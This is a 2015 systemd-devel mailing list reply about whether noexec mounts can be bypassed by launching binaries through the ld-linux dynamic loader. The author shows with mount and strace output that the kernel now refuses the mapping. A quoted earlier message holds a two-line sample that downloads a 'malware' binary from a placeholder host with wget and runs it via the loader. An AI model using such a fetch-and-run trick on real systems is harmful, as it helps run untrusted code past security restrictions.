[systemd-devel] Mount options of /var/run/users/<pid>
Mantas Mikulėnas
grawity at gmail.com
Mon Feb 16 12:02:09 PST 2015
On Mon, Feb 16, 2015 at 9:40 PM, Reindl Harald <h.reindl at thelounge.net>
wrote:
>
>
> Am 16.02.2015 um 20:31 schrieb Mantas Mikulėnas:
>
>> On Mon, Feb 16, 2015 at 9:16 PM, Simon McVittie
>> <simon.mcvittie at collabora.co.uk <mailto:simon.mcvittie at collabora.co.uk>>
>> wrote:
>>
>> wget http://example.com/malware.__x86.bin
>> <http://example.com/malware.x86.bin>
>> /lib/ld-linux.so.2 malware.x86.bin
>>
>>
>> Pretty sure this no longer works; these days noexec prevents
>> mmap(PROT_EXEC) as well
>>
>
> you should not assume when you can try it simple
> [...]
> [root at arrakis:~]$ bash /Volumes/dune/test.sh
> config-3.18.7-100.fc20.x86_64 grub2 initramfs-3.18.7-100.fc20.x86_64.img
> initrd-plymouth.img lost+found System.map-3.18.7-100.fc20.x86_64
> vmlinuz-3.18.7-100.fc20.x86_64
>
And you should not reply before you read the actual post, in which I
specifically reply to a comment about ld-linux.so – not script
interpreters, which don't rely on this function.
# mount | grep /test
/test.img on /mnt/test type ext4 (rw,noexec,relatime,data=ordered)
# cp -a /bin/echo /mnt/test/echo
# chmod a+rx /mnt/test/echo
# /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo
/mnt/test/echo: error while loading shared libraries: /mnt/test/echo:
failed to map segment from shared object
# strace /usr/lib/ld-linux-x86-64.so.2 /mnt/test/echo
open("/mnt/test/echo", O_RDONLY|O_CLOEXEC) = 3
mmap(0x400000, 28672, PROT_READ|PROT_EXEC,
MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 3, 0) = -1 EPERM (Operation not
permitted)
#
--
Mantas Mikulėnas <grawity at gmail.com>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.freedesktop.org/archives/systemd-devel/attachments/20150216/f840556b/attachment.html>
More information about the systemd-devel
mailing list